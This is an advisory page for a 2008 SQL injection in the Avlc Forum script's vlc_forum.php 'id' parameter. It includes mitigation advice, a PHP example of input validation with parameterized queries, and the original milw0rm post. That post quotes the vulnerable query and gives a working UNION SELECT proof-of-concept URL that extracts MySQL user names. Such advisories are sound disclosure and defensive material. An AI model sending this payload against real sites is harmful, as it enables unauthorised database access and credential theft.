Vendor: Avlc Forum
By: CWH Underground
CVSS: 8.8 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: Avlc Forum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

A vulnerability exists in Avlc Forum due to improper sanitization of user-supplied input in the 'id' parameter of the 'vlc_forum.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database, allowing for the manipulation or disclosure of arbitrary data.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. Additionally, parameterized queries should be used to prevent SQL injection attacks.
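
The mitigation above applied to the query at lines 141-142 of vlc_forum.php (quoted in the raw advisory below), as an added example that is not the vendor's or the advisory author's code. It assumes PDO, with an in-memory SQLite table of constructed rows standing in for the MySQL back end; the function name `fetchThread` and the `body` column are hypothetical.

```php
<?php
// Added example. Original (vulnerable) form, for comparison:
//   $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
// $id is interpolated unquoted, so any SQL fragment in it becomes part of the
// statement, and the die() call echoes the query and DB error to the client.

function fetchThread(PDO $db, $rawId): array
{
    // 1. Validate: a forum id is a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];                      // reject; never hand the raw value to SQL
    }
    // 2. Parameterize: the value is bound, not concatenated. Two placeholders are
    //    used because native MySQL prepares do not allow reusing one named marker.
    $stmt = $db->prepare('SELECT id, re, body FROM vlc_forum WHERE id = :id OR re = :re');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':re', $id, PDO::PARAM_INT);
    try {
        $stmt->execute();
    } catch (PDOException $e) {
        error_log('vlc_forum lookup failed: ' . $e->getMessage()); // log server-side only
        return [];
    }
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed stand-in database. Against MySQL, also set
// PDO::ATTR_EMULATE_PREPARES to false so binding happens server-side.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE vlc_forum (id INTEGER PRIMARY KEY, re INTEGER, body TEXT)');
$db->exec("INSERT INTO vlc_forum (id, re, body) VALUES
           (1, 0, 'first post'), (2, 1, 'reply to post 1'), (3, 0, 'other thread')");

// Constructed inputs: one legitimate id, two non-integer values of the kind
// the advisory describes, and a missing parameter.
$inputs = ['1', '-999999/**/UNION/**/SELECT/**/1', '1 OR 1=1', null];
foreach ($inputs as $in) {
    printf("%s => %d row(s)\n", var_export($in, true), count(fetchThread($db, $in)));
}
```

Only the integer input reaches the database; every other value is rejected before a statement is prepared, and the bound parameter keeps the query shape fixed even if validation were bypassed.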

Exploit-DB raw data:

====================================================================
  Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
====================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 12 July 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Avlc Forum
 VERSION     : N/A
 VENDOR	     : N/A
 DOWNLOAD    : http://www.easy-script.com/compt.php?id=2147
#####################################################

-- Remote SQL Injection ---

---------------------------------
 Vulnerable File [vlc_forum.php]
---------------------------------

@Line

   141:  $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
   142:  $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());


-------------
 POC Exploit
-------------

[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--


#####################################################################
 Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   
 Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-07-12]